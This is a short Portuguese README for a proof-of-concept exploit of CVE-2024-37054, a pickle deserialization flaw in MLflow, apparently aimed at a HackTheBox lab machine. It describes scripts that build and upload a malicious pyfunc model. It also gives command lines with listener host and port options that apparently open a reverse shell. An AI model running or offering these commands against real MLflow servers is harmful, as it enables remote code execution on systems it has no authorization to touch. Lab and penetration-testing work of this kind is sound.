
PoC para CVE-2024-37054
Prova de conceito para CVE-2024-37054, uma vulnerabilidade crítica de desserialização nas versões 0.9.0 a 2.14.1 do MLflow.
Quando um modelo pyfunc malicioso é carregado via mlflow.pyfunc.load_model(), o payload serializado com pickle executa código arbitrário.
exploit.py — exploit completo: registrar, treinar, enviar, acionar (para a máquina SmartHire do HTB)build_model.py — construir modelo malicioso localmente (apenas build)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
Apenas para fins educacionais e testes de penetração autorizados.